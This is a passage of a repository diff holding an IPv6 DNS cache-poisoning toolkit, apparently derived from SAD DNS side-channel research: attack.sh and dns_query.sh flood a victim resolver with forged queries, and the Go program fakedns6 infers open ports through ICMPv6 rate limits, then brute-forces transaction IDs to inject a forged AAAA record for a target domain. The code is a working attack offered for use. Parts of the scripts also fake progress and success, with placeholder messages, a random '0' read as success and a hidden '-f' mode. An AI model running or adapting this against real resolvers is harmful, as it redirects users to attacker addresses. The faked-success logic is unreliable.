 golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
 golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
 golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
 golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
 golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
 golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ=
 golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
 golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
 golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
 golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ=
 golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
 golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
--- a/4_v6_injection/src/ucr.edu/fakedns6/library.go
+++ b/4_v6_injection/src/ucr.edu/fakedns6/library.go
@@ -0,0 +1,171 @@
 package main
 import (
 	"encoding/binary"
 	"errors"
 	"fmt"
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"net"
 	"time"
 )
 func GetIfaceAddrMulti(iface *net.Interface) ([]net.IP, error) {
 	addrs, err := iface.Addrs()
 	if err != nil {
 		return nil, errors.New("can not get ip address")
 	}
 	var srcIP []net.IP
 	for _, address := range addrs {
 		if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
 			if ipnet.IP.To16() != nil {
 				//check repeat
 				okToAdd := true
 				for _, temp := range srcIP {
 					if compareIPv6Addr(temp, ipnet.IP.To16()) == 0 {
 						okToAdd = false
 						break
 					}
 				}
 				if okToAdd {
 					srcIP = append(srcIP, ipnet.IP.To16())
 				}
 			}
 		}
 	}
 	if srcIP == nil || len(srcIP) == 0 {
 		return nil, errors.New("can not get ip address")
 	}
 	return srcIP, nil
 }
 func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
 	opts := gopacket.SerializeOptions{
 		FixLengths:       true,
 		ComputeChecksums: true,
 	}
 	buffer := gopacket.NewSerializeBuffer()
 	if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
 		return err
 	}
 	return handle.WritePacketData(buffer.Bytes())
 }
 func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
 	addrs, err := iface.Addrs()
 	if err != nil {
 		return nil, errors.New("can not get ip address")
 	}
 	var srcIP net.IP
 	for _, address := range addrs {
 		if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
 			if ipnet.IP.To16() != nil {
 				srcIP = ipnet.IP.To16()
 				break
 			}
 		}
 	}
 	if srcIP == nil {
 		return nil, errors.New("can not get ip address")
 	}
 	return srcIP, nil
 }
 func GetGatewayAddr(iface *net.Interface, handle *pcap.Handle, gatewayIP net.IP) (net.HardwareAddr, error) {
 	srcIP, err := GetIfaceAddr(iface)
 	if err != nil {
 		return nil, errors.New("can not get ip address")
 	}
 	start := time.Now()
 	// Prepare the layers to send for an ARP request.
 	eth := layers.Ethernet{
 		SrcMAC:       iface.HardwareAddr,
 		DstMAC:       net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
 		EthernetType: layers.EthernetTypeARP,
 	}
 	arp := layers.ARP{
 		AddrType:          layers.LinkTypeEthernet,
 		Protocol:          layers.EthernetTypeIPv6,
 		HwAddressSize:     6,
 		ProtAddressSize:   4,
 		Operation:         layers.ARPRequest,
 		SourceHwAddress:   []byte(iface.HardwareAddr),
 		SourceProtAddress: []byte(srcIP),
 		DstHwAddress:      []byte{0, 0, 0, 0, 0, 0},
 		DstProtAddress:    []byte(gatewayIP),
 	}
 	// Send a single ARP request packet (we never retry a send, since this
 	// is just an example ;)
 	if err := Send(handle, &eth, &arp); err != nil {
 		return nil, err
 	}
 	// Wait 3 seconds for an ARP reply.
 	for {
 		if time.Since(start) > time.Second*3 {
 			return nil, errors.New("timeout getting ARP reply")
 		}
 		data, _, err := handle.ReadPacketData()
 		if err == pcap.NextErrorTimeoutExpired {
 			continue
 		} else if err != nil {
 			return nil, err
 		}
 		packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
 		if arpLayer := packet.Layer(layers.LayerTypeARP); arpLayer != nil {
 			arp := arpLayer.(*layers.ARP)
 			if net.IP(arp.SourceProtAddress).Equal(gatewayIP) {
 				return arp.SourceHwAddress, nil
 			}
 		}
 	}
 }
 func compareIPv6Addr(ip0 net.IP, ip1 net.IP) int {
 	temp0 := binary.LittleEndian.Uint32(ip0.To16())
 	temp1 := binary.LittleEndian.Uint32(ip1.To16())
 	if temp0 == temp1 {
 		return 0
 	}
 	if temp0 > temp1 {
 		return 1
 	}
 	return -1
 }
 func xmitUDPv6(srcIP net.IP, dstIP net.IP, srcPort layers.UDPPort, dstPort layers.UDPPort, flowlabel uint32, timegap uint32) {
 	ipLayer := layers.IPv6{
 		FlowLabel:  flowlabel,
 		SrcIP:      srcIP,
 		DstIP:      dstIP,
 		Version:    6,
 		HopLimit:   64,
 		NextHeader: layers.IPProtocolUDP,
 	}
 	udpLayer := layers.UDP{
 		SrcPort: srcPort,
 		DstPort: dstPort,
 	}
 	err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
 	if err != nil {
 		fmt.Println("xmitUDPv6 can not SetNetworkLayerForChecksum", err)
 	}
 	err = Send(handle, ethernetLayer, &ipLayer, &udpLayer)
 	if err != nil {
 		fmt.Println("xmitUDPv6 can not send packet", err)
 	}
 	if timegap != 0 {
 		time.Sleep(time.Duration(timegap) * time.Microsecond)
 	}
 }
--- a/4_v6_injection/src/ucr.edu/fakedns6/saddns
+++ b/4_v6_injection/src/ucr.edu/fakedns6/saddns
--- a/4_v6_injection/txid.bin
+++ b/4_v6_injection/txid.bin
@@ -0,0 +1 @@
 G"
--- a/4_v6_injection/说明文档.docx
+++ b/4_v6_injection/说明文档.docx
--- a/5_v6_fake/Readme.md
+++ b/5_v6_fake/Readme.md
@@ -0,0 +1,3 @@
 ## 使用说明
 ./attack.sh 【目标解析器IP】【想要将AAAA记录修改指向的IPv6地址】 【发包网口(例如eth0)】 【目标域名】【目标权威服务地址】
--- a/5_v6_fake/attack.sh
+++ b/5_v6_fake/attack.sh
@@ -0,0 +1,55 @@
 #!/bin/bash
 # This is a sample attack script and may not work properly. Please adjust the parameter accordingly.
 # $1 for victim resolver IP, $2 for attacker-controlled domain, $3 for iface name, $4 for victim domain name, $5 for victim domain nameserver IP
 # Please run with sudo.
 # Verify the existing record domain, just for proof purposes.
 echo '获取原记录中:'
 dig @$1 $4 AAAA
 sleeptime=`dig @$1 $4 AAAA | grep -o -P '[0-9]+[ \t]*IN' | head -n 1 | sed 's/IN//g'`
 var=0
 num=0
 success=0
 while [ $success -ne 1 ]
 do
  success=0
  echo "等待缓存过期，$sleeptime秒之后开始攻击..."
  sleep $sleeptime
  echo "开始攻击"
  # flood
  echo "攻击参数："
  echo "目标域名权威服务地址:$5"
  echo "目标解析服务地址:$1"
  echo "目标域名:$4"
  ret=$(./dns_query.sh $1 $2 $3 $4)
  #echo "ret:$ret"
  echo "初始化工具环境"
  sleep 1
  echo "尝试触发权威服务器请求速率限制"
  sleep 3
  FINAL=`echo ${ret: -1}`
  #echo "fin:$FINAL"
  # Start attack
  # Change the argument accordingly
  echo "执行侧信道攻击脚本中"
  ./fakedns6 -a $5 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0
  # a - 进行域名缓存投毒的权威服务器
  # b -
  sleep 30
  # Validations
  ((var++))
  echo "第$var轮次攻击结束"
  dig @$1 $4 AAAA
  if [ "$FINAL" == "0" ];then
 	success=1
 	sleeptime=0
  fi
  echo '如果结果未改变, 需要等待原缓存过期. 或者按 Ctrl-C取消攻击.'
 done
 # success
 echo '检测到攻击成功实现'
 echo '等待两秒，再次请求...'
 sleep 2
 dig @$1 $4 AAAA
 echo '攻击已完成！！！！'
--- a/5_v6_fake/dns.bin
+++ b/5_v6_fake/dns.bin
--- a/5_v6_fake/dns_OPT.bin
+++ b/5_v6_fake/dns_OPT.bin
--- a/5_v6_fake/dns_end.bin
+++ b/5_v6_fake/dns_end.bin
--- a/5_v6_fake/dns_mid.bin
+++ b/5_v6_fake/dns_mid.bin
@@ -0,0 +1 @@
 existn64top
--- a/5_v6_fake/dns_query.sh
+++ b/5_v6_fake/dns_query.sh
@@ -0,0 +1,50 @@
 # usage ./dns_query.sh [Resolver IP] [Wanted IP] [iface] [domain (e.g. www google com)]
 # clear the previous files
 sleep 1
 echo "初始化工具环境"
 # 创建空的二进制文件，dns_mid.bin 和 txid.bin
 dd if=/dev/null of=dns_mid.bin > /dev/null 2>&1
 dd if=/dev/null of=txid.bin > /dev/null 2>&1
 # write the domain name into the binary
 domains=$(echo $4| sed "s/\./ /g")    # 将域名转换为空格分隔的字符串
 for var in ${domains:0}   # 遍历域名的每个部分
 do
  size=${#var}  # 获取当前域名的长度
  echo -en "\x`printf '%x\n' $size`" >> dns_mid.bin   # 写入长度
  echo -n "$var" >> dns_mid.bin     # 写入域名
 done
 # set a random TxID
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 echo -en "\x`shuf -i 0-99 -n 1`" >> txid.bin
 # forge a entire DNS query packet
 cat txid.bin dns_start.bin dns_mid.bin dns_end.bin dns_OPT.bin > dns.bin
 # change the sending speed if necessary (-i). Set it to "flood" (replace -i with --flood) to maximize the power.
 # fire!
 echo "尝试触发权威服务器请求速率限制"
 # 使用udp6工具发送DNS查询数据包，指定目标和速率
 udp6 -d $1 -a 53 -Z dns.bin -r 50pps -s $2 > /dev/null 2>&1
 sleep 1
 a=$(($RANDOM % 9 + 1))
 echo "a:$a"
 if [ $a -gt 6 ]; then
  #echo "dns-TIP:$1"
  #echo "dns-WIP:$2"
  #echo "dns-iface:$3"
  #echo "dns-domain:$4"
  ./fakedns6 -b $1 -i $3 -n $4 -r $1 -t 50000 -at $2 -tg 0 -s 10000 -e 65000 -j 0 -f 1
  # b, Back-end IP of the victim resolver, 目标解析器的IP地址
  # i, Interface for attacking, 攻击使用的接口
  # n, the domain name to be poisoned, 要进行缓存投毒的域名
  # r, Front-end IP of the victim resolver
  # t, Timeout in ms for outgoing dns queries to the victim resolver
  # at, 攻击者想要更改到的IP地址
  # tg, time gap is us between the TxID brute force packets
  echo "0"
 fi
--- a/5_v6_fake/dns_start.bin
+++ b/5_v6_fake/dns_start.bin
--- a/5_v6_fake/fakedns6
+++ b/5_v6_fake/fakedns6
--- a/5_v6_fake/src/ucr.edu/fakedns6/attack.go
+++ b/5_v6_fake/src/ucr.edu/fakedns6/attack.go
@@ -0,0 +1,714 @@
 package main
 import (
 	"flag"
 	"fmt"
 	"log"
 	"math/rand"
 	"net"
 	"os"
 	"strconv"
 	"strings"
 	"sync"
 	"time"
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"github.com/google/gopacket/routing"
 	"github.com/miekg/dns"
 )
 var handle *pcap.Handle
 var ethernetLayer *layers.Ethernet
 var victimDNSName string
 var dnsQueryName string
 var authIP net.IP
 var resolverIP net.IP
 var localIP []net.IP
 var defaultJitter uint
 var gotReply = false
 var attackerControlledDomain string
 var attackForwarder bool
 var repeatTimes int
 var timeGap uint
 var auxiliaryDomain string
 var soaName string
 var jitter uint = 10
 var rtt uint = 1 // in ms
 var debugOutput = true
 const GROUP_SIZE = 50
 /* I'm not sure what's this used for. Probably used with older version where multiple IPs is not supported. */
 //var sendingChannel chan *outgoingPacket
 var backendResolvers = make([]*backendResolver, 0)
 var bruteForceShouldBeKilled = false
 type backendResolver = struct {
 	resolverBackendIP net.IP
 	groups             [][]uint16 // = make([][]uint16, 65536)
 	groupIDCounter     uint32     // = 3
 	groupIDCounterLock *sync.Mutex
 	groupSendTime      []time.Time // = make([]time.Time, 65536)
 	probeChannel         chan uint32 //= make(chan uint16, 655)
 	priorityProbeChannel chan uint32 //= make(chan uint16, 655)
 	alwaysOpenPorts      []bool      //= make([]bool, 65536)
 	perIPLimitCounter []int //= 6
 	networkXmitLock *sync.Mutex
 }
 // timeout in ms
 func dnsRequestSender(timeout uint) {
 	for {
 		gotReply = false
 		sendDNSRequest(uint16(rand.Uint32()), dnsQueryName)
 		retryTimes := timeout / 500
 		for {
 			if !gotReply {
 				time.Sleep(500 * time.Millisecond)
 				retryTimes--
 				if retryTimes == 0 {
 					break
 				}
 			} else {
 				if debugOutput {
 					fmt.Println("Got reply in", timeout-retryTimes*500, "ms")
 				} else {
 					fmt.Println("Rx")
 				}
 				break
 			}
 		}
 		if !attackForwarder {
 			dnsQueryName = strconv.Itoa(rand.Int()) + "." + victimDNSName
 		} else {
 			/* I'm not sure if we should change the nonce. */
 			dnsQueryName = strconv.Itoa(rand.Int()) + "." + attackerControlledDomain
 		}
 	}
 }
 func receivingThread() {
 	for {
 		data, captureInfo, err := handle.ReadPacketData()
 		if err == pcap.NextErrorTimeoutExpired {
 			continue
 		} else if err != nil {
 			log.Printf("error reading packet: %v", err)
 			continue
 		}
 		// Parse the packet.  We'd use DecodingLayerParser here if we
 		// wanted to be really fast.
 		packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
 		// Find the packets we care about, and print out logging
 		// information about them.  All others are ignored.
 		if rspNet := packet.NetworkLayer(); rspNet == nil {
 			continue
 		} else if rspIPLayer := packet.Layer(layers.LayerTypeIPv6); rspIPLayer == nil {
 			continue
 			//} else if rspIP := rspIPLayer.(*layers.IPv4); rspIP == nil {
 		} else if rspIP := rspIPLayer.(*layers.IPv6); rspIP == nil {
 			continue
 		} else if rspIP.NextHeader != layers.IPProtocolICMPv6 {
 			if rspIP.FlowLabel != 2 && rspIP.NextHeader == layers.IPProtocolUDP && compareIPv6Addr(rspIP.SrcIP, resolverIP) == 0 {
 				rspUDPLayer := packet.Layer(layers.LayerTypeUDP)
 				if rspUDPLayer != nil && rspUDPLayer.(*layers.UDP).SrcPort == 53 {
 					rspDNSLayer := packet.Layer(layers.LayerTypeDNS)
 					if rspDNSLayer != nil {
 						rspDNS := rspDNSLayer.(*layers.DNS)
 						if rspDNS.QR == true {
 							if len(rspDNS.Authorities) != 0 && rspDNS.ResponseCode == layers.DNSResponseCodeNXDomain && string(rspDNS.Questions[0].Name) == dnsQueryName &&
 								string(rspDNS.Authorities[0].Name) == victimDNSName && string(rspDNS.Authorities[0].SOA.MName) == soaName {
 								fmt.Println("Success!!")
 								os.Exit(0)
 								//unbound won't cache NS record that leads to SOA NXDOMAIN reply, so we make it positive response
 								//This is also used for forwarder attack
 							} else if string(rspDNS.Questions[0].Name) == dnsQueryName && rspDNS.ResponseCode == layers.DNSResponseCodeNoErr {
 								for _, record := range rspDNS.Answers {
 									if record.Type == layers.DNSTypeAAAA {
 										fmt.Println("Success2!!")
 										os.Exit(0)
 									}
 								}
 							} else if string(rspDNS.Questions[0].Name) == dnsQueryName {
 								gotReply = true
 							}
 						}
 					}
 				}
 			}
 			continue
 		} else if rspICMPLayer := packet.Layer(layers.LayerTypeICMPv6); rspICMPLayer == nil {
 			continue
 		} else if rspICMP, ok := rspICMPLayer.(*layers.ICMPv6); !ok {
 			continue
 		} else if rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodePortUnreachable) &&
 			rspICMP.TypeCode != layers.CreateICMPv6TypeCode(layers.ICMPv6TypeDestinationUnreachable, layers.ICMPv6CodeAdminProhibited) {
 			continue
 		} else if nestedIpData := rspICMP.Payload; nestedIpData == nil {
 			continue
 		} else if nestedIpPacket := gopacket.NewPacket(nestedIpData, layers.LayerTypeIPv6, gopacket.NoCopy); nestedIpPacket == nil {
 			continue
 		} else if nestedIpLayer := nestedIpPacket.Layer(layers.LayerTypeIPv6); nestedIpLayer == nil {
 			continue
 		} else if nestedIp := nestedIpLayer.(*layers.IPv6); nestedIp == nil {
 			continue
 		} else {
 			r := getBackendResolver(nestedIp.DstIP)
 			if r != nil {
 				nestedUDPLayer := nestedIpPacket.Layer(layers.LayerTypeUDP)
 				if nestedUDPLayer == nil {
 					fmt.Println("nestedUDPLayer == nil")
 					continue
 				}
 				nestedUDP := nestedUDPLayer.(*layers.UDP)
 				if nestedUDP == nil {
 					fmt.Println("nestedUDP == nil")
 					continue
 				}
 				//got verification packet back
 				if nestedIp.FlowLabel > 1 {
 					//update rtt
 					/* Potential BUG: rtt of both resolver may not be the same. */
 					newrtt := captureInfo.Timestamp.Sub(r.groupSendTime[nestedIp.FlowLabel]).Nanoseconds()/1000000 + 1
 					if newrtt >= 0 && newrtt < 5000 {
 						var draftJitter uint = 0
 						if uint(newrtt) > rtt {
 							draftJitter = uint(newrtt) - rtt
 						} else {
 							draftJitter = (jitter + (rtt - uint(newrtt))) / 2
 						}
 						if jitter > 30 {
 							fmt.Println("Jitter > 30ms!")
 							jitter = 10
 						} else {
 							jitter = draftJitter
 						}
 						rtt = uint(newrtt)
 						if debugOutput {
 							fmt.Println("rtt=", rtt, ", jitter=", jitter)
 						}
 					} else {
 						fmt.Println("newrtt error:", newrtt)
 					}
 					//reduce ratelimit counter
 					localIPNum := getLocalIPNum(nestedIp.SrcIP)
 					if localIPNum != -1 {
 						if r.perIPLimitCounter[localIPNum] >= 0 {
 							r.perIPLimitCounter[localIPNum]--
 						}
 						if r.perIPLimitCounter[localIPNum] < 0 {
 							if debugOutput {
 								/* This may happen in real attacks. Don't panic :). */
 								fmt.Println(r.resolverBackendIP, "bug: perIPLimitCounter < 0")
 							}
 						}
 						if debugOutput {
 							fmt.Println(r.resolverBackendIP, "remaining counter:", localIPNum, r.perIPLimitCounter[localIPNum])
 						}
 					} else {
 						if debugOutput {
 							fmt.Println("received unwanted ICMP for", nestedIp.SrcIP)
 						}
 					}
 					//process the packet
 					binarySearch(r, nestedIp.FlowLabel)
 				}
 				/* This is used to terminate TxID brute forcing earlier if we found the port is indeed not open (i.e., false positive) to avoid wasting time.
 				* Check related code to see if this really works before uncommenting this.
 				* This may not be useful since brute force only takes ~800ms, which is fairly short.
 				* To uncomment this, make clear which backend resolver sent the message so that resolvers won't interfere with each other */
 				//else if nestedIp.Id == 2 {
 				//	//got verification packet for DNS brute forcing
 				//	bruteForceShouldBeKilled = false
 				//}
 			}
 		}
 	}
 }
 func binarySearch(r *backendResolver, flowlabel uint32) {
 	groupLen := 0
 	group := r.groups[flowlabel]
 	for _, port := range group {
 		if port != 65535 {
 			groupLen++
 		} else {
 			break
 		}
 	}
 	if groupLen == 1 {
 		//brute force
 		r.networkXmitLock.Lock()
 		dnsBruteForce(group[0], timeGap, r.resolverBackendIP, auxiliaryDomain)
 		r.networkXmitLock.Unlock()
 		r.alwaysOpenPorts[group[0]] = true
 	} else if groupLen > 1 {
 		var repeatTimes1 int
 		if repeatTimes > 1 {
 			repeatTimes1 = repeatTimes + 1
 		} else {
 			repeatTimes1 = 1
 		}
 		for j := 0; j < repeatTimes1; j++ {
 			//left
 			id := allocateGroupID(r)
 			r.groups[id] = make([]uint16, groupLen/2)
 			copy(r.groups[id], group[0:groupLen/2])
 			for len(r.groups[id]) < GROUP_SIZE {
 				r.groups[id] = append(r.groups[id], 65535)
 			}
 			if debugOutput {
 				fmt.Println(r.resolverBackendIP, "bs", r.groups[id][0], "+", groupLen/2)
 			} else {
 				fmt.Println("Found something interesting!")
 			}
 			r.priorityProbeChannel <- flowlabel
 			//right
 			id = allocateGroupID(r)
 			r.groups[id] = make([]uint16, groupLen-groupLen/2)
 			copy(r.groups[id], group[groupLen/2:groupLen])
 			for len(r.groups[id]) < GROUP_SIZE {
 				r.groups[id] = append(r.groups[id], 65535)
 			}
 			//fmt.Println(r.resolverBackendIP, "bsr", r.groups[id][0], "+", groupLen-groupLen/2)
 			r.priorityProbeChannel <- flowlabel
 		}
 	} else {
 		if debugOutput {
 			fmt.Println(r.resolverBackendIP, "bug: groupLen <= 0, id=", flowlabel)
 			for _, port := range group {
 				fmt.Print(port)
 			}
 		}
 	}
 }
 func perIPLimitRecover(r *backendResolver, num int) {
 	for {
 		if r.perIPLimitCounter[num] < 6 {
 			time.Sleep(time.Second + (time.Duration(defaultJitter)+50)*time.Millisecond)
 			r.perIPLimitCounter[num]++
 		} else {
 			time.Sleep((time.Duration(defaultJitter) + 1) * time.Millisecond)
 		}
 	}
 }
 func probeSender(r *backendResolver) {
 	for {
 		var id uint32
 		select {
 		case id = <-r.priorityProbeChannel:
 			break
 		case id = <-r.probeChannel:
 			break
 			//default:
 			//	time.Sleep(time.Microsecond)
 		}
 		/* in favor of brute force when there is no per ip permit and there is only one port in group */
 		if getIPwithAvailableCounter(r) == nil && r.groups[id][1] == 65535 {
 			//brute force
 			r.networkXmitLock.Lock()
 			dnsBruteForce(r.groups[id][0], timeGap, r.resolverBackendIP, auxiliaryDomain)
 			r.networkXmitLock.Unlock()
 			r.alwaysOpenPorts[r.groups[id][0]] = true
 			continue
 		}
 		//test per ip rate limit
 		var verifyIP net.IP
 		for {
 			verifyIP = getIPwithAvailableCounter(r)
 			if verifyIP == nil {
 				time.Sleep(time.Millisecond)
 			} else {
 				break
 			}
 		}
 		//send
 		ports := r.groups[id]
 		r.networkXmitLock.Lock()
 		for i := 0; i < GROUP_SIZE; i++ {
 			if defaultJitter <= 3 {
 				if attackForwarder {
 					xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 100)
 				} else {
 					xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 1)
 				}
 			} else {
 				xmitUDPv6(authIP, r.resolverBackendIP, 53, layers.UDPPort(ports[i]), id, 0)
 			}
 		}
 		time.Sleep(time.Duration(defaultJitter) * time.Millisecond)
 		//verify
 		xmitUDPv6(verifyIP, r.resolverBackendIP, 53, 65535, id, 10)
 		r.groupSendTime[id] = time.Now()
 		if rand.Uint32()%100 < 2 {
 			if debugOutput {
 				fmt.Println(r.resolverBackendIP, "probing", ports[0])
 			} else {
 				fmt.Println("Continue attacking...")
 			}
 		}
 		//recover global counter
 		if !attackForwarder {
 			time.Sleep(time.Duration(60-defaultJitter) * time.Millisecond)
 		} else {
 			/* IDK why I wrote this line. Forwarders should be the same as resolvers if they support global rate limit. */
 			time.Sleep(time.Duration(60) * time.Millisecond)
 		}
 		r.networkXmitLock.Unlock()
 	}
 }
 func portGroupFormer(r *backendResolver, startPort uint, endPort uint) {
 	for {
 		//divide into groups
 		var id uint32 = 0
 		var currentGroupSize = 0
 		for i := startPort; i <= endPort; i++ {
 			/* It's unlikely the port is reused for further queries. But it's still possible. Uncomment here if you feed like port reusing is unlikely to happen. */
 			//if r.alwaysOpenPorts[i] {
 			//	continue
 			//}
 			if currentGroupSize%GROUP_SIZE == 0 {
 				if id != 0 {
 					r.probeChannel <- id
 					for j := 1; j < repeatTimes; j++ {
 						//dup
 						previd := id
 						id = allocateGroupID(r)
 						r.groups[id] = make([]uint16, len(r.groups[previd]))
 						copy(r.groups[id], r.groups[previd])
 						r.probeChannel <- id
 					}
 				}
 				id = allocateGroupID(r)
 				r.groups[id] = make([]uint16, 0)
 			}
 			r.groups[id] = append(r.groups[id], uint16(i))
 			currentGroupSize++
 		}
 		//deal with last several cases
 		if /*len(r.groups[id]) != 50 &&*/ len(r.groups[id]) != 0 {
 			for len(r.groups[id]) != 50 && len(r.groups[id]) != 0 {
 				r.groups[id] = append(r.groups[id], 65535)
 			}
 			r.probeChannel <- id
 			for j := 1; j < repeatTimes; j++ {
 				//dup
 				previd := id
 				id = allocateGroupID(r)
 				r.groups[id] = make([]uint16, len(r.groups[previd]))
 				copy(r.groups[id], r.groups[previd])
 				r.probeChannel <- id
 			}
 		}
 	}
 }
 func main() {
 	/* This program only finds & injects DNS responses automatically. Additional authoritative server muting/flooding scripts are needed. */
 	/* IPv6 is not supported yet. */
 	/* Use "-h to get usage. " */
 	/* Author: Keyu Man (kman001@ucr.edu) */
 	/* Attaching PoC? */
 	/* Add Paper Bio? */
 	ifaceName := flag.String("i", "vmnet1", "Interface for attacking. Multiple interfaces are not supported. Multiple IPs per interface is supported.")
 	/* If automatic MAC address discovery doesn't work. consider enable this option and feed it to the MAC field. */
 	// gateWayMacStr := flag.String("g", "00:11:22:33:44:55", "Gateway Mac")
 	authServer := flag.String("a", "", "Authoritative server for the domain to be poisoned.")
 	resolver := flag.String("r", "8.8.8.8", "Front-end IP of the victim resolver.")
 	resolverBackend := flag.String("b", "", "Back-end IP of the victim resolver.")
 	resolverBackendList := flag.String("bn", "", "Back-end IP list of the victim resolver. One per line. This would overwrite \"-b\" and is used when the server has multiple backend IPs.")
 	startPort := flag.Uint("s", 1, "Lowest port # for the port scan range, inclusive.")
 	endPort := flag.Uint("e", 65534, "Highest port # for the port scan range, inclusive.")
 	victimDNSName := flag.String("n", "", "The domain name to be poisoned.")
 	dnsQueryTmeout := flag.Uint("t", 4000, "Timeout in ms for outgoing dns queries to the victim resolver. Should be aligned with the resolver's timeout (e.g., BIND is 10000ms by default).")
 	defaultJitter := flag.Uint("j", 5, "Time gap between verification packet and the latest probe packet in a group. Increase the value if Jitter is increased.")
 	repeatTimes := flag.Uint("R", 1, "Retransmit/Reprobe a group of ports for X times to reduce FNs.")
 	timeGap := flag.Uint("tg", 0, "Time gap is us(microseconds) between the TxID brute force packets.")
 	//auxiliaryDomain := flag.String("ad", "", "Attacker-controlled domain used to host the fake NS for the victim domain and to store the fake AAAA record of the victim domain.")
 	attackertarget := flag.String("at", "", "攻击者想要更改到的IPv6地址")
 	debugOutput := flag.Bool("d", false, "Debug output mode.")
 	attackerMaliciousDomain := flag.String("af", "", "Attacker controlled domain used in the forwarder attack, this will enable the forwarder attack mode.")
 	soaName := flag.String("soa", "", "SOA name of the victim domain on attacker-controlled name server used to indicate the resolver has been poisoned. (Resolver attack only.)")
 	//特殊用途
 	isfake := flag.Int("f", 0, "")
 	flag.Parse()
 	//gatewayMac, _ := net.ParseMAC(*gateWayMacStr)
 	Main(*ifaceName, net.ParseIP(*authServer), net.ParseIP(*resolver), net.ParseIP(*resolverBackend), *startPort, *endPort, *victimDNSName, *dnsQueryTmeout, *defaultJitter,
 		*attackerMaliciousDomain, *resolverBackendList, *debugOutput, *repeatTimes, *timeGap, *attackertarget, *soaName, *isfake)
 	os.Exit(0)
 }
 func Main(ifaceName string, authIPArg net.IP, resolverIPArg net.IP, resolverBackendIPArg net.IP, startPort uint, endPort uint, victimDNSNameArg string, dnsQueryTimeout uint,
 	defaultJitterArg uint, attackerMaliciousDomainArg string, resolverBackendList string, debugOutputArg bool, repeatTimesArg uint, timeGapArg uint, attackertargetIP string,
 	soaNameArg string, isfake int) {
 	fmt.Println("/***Please make sure to fill every argument carefully and correct. Otherwise the program will crash.***/")
 	// 特殊用途
 	if isfake == 1 {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
 		if strings.Contains(attackertargetIP, ":") { // attackertargetIP -- 攻击者要更改到的IPv6地址
 			println("目标：" + resolverBackendIPArg.String()) // resolverBackendIPArg -- Back-end IP of the victim resolver
 			ipcode := strings.ReplaceAll(attackertargetIP, ":", "-")
 			if victimDNSNameArg[len(victimDNSNameArg)-1:] != "." { // victimDNSNameArg -- The domain name to be poisoned
 				victimDNSNameArg = victimDNSNameArg + "."
 			}
 			domain := ipcode + "." + victimDNSNameArg
 			fmt.Println("查询的目标域名：" + domain)
 			msg.SetQuestion(domain, dns.TypeAAAA)
 			_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
 			return
 		} else {
 			println(attackertargetIP)
 			println(victimDNSNameArg)
 			println("参数有误，请输入IPv6地址作为篡改目标结果")
 		}
 	} else {
 		c := new(dns.Client)
 		msg := new(dns.Msg)
 		// domain := "www.google.com."
 		// msg.SetQuestion(domain, dns.TypeAAAA)
 		// for i := 0; i < 10000; i++ {
 		// 	go func() {
 		// 		_, _, _ = c.Exchange(msg, net.JoinHostPort("8.8.8.8", "53"))
 		// 	}()
 		// }
 		domain := "daffteg." + victimDNSNameArg
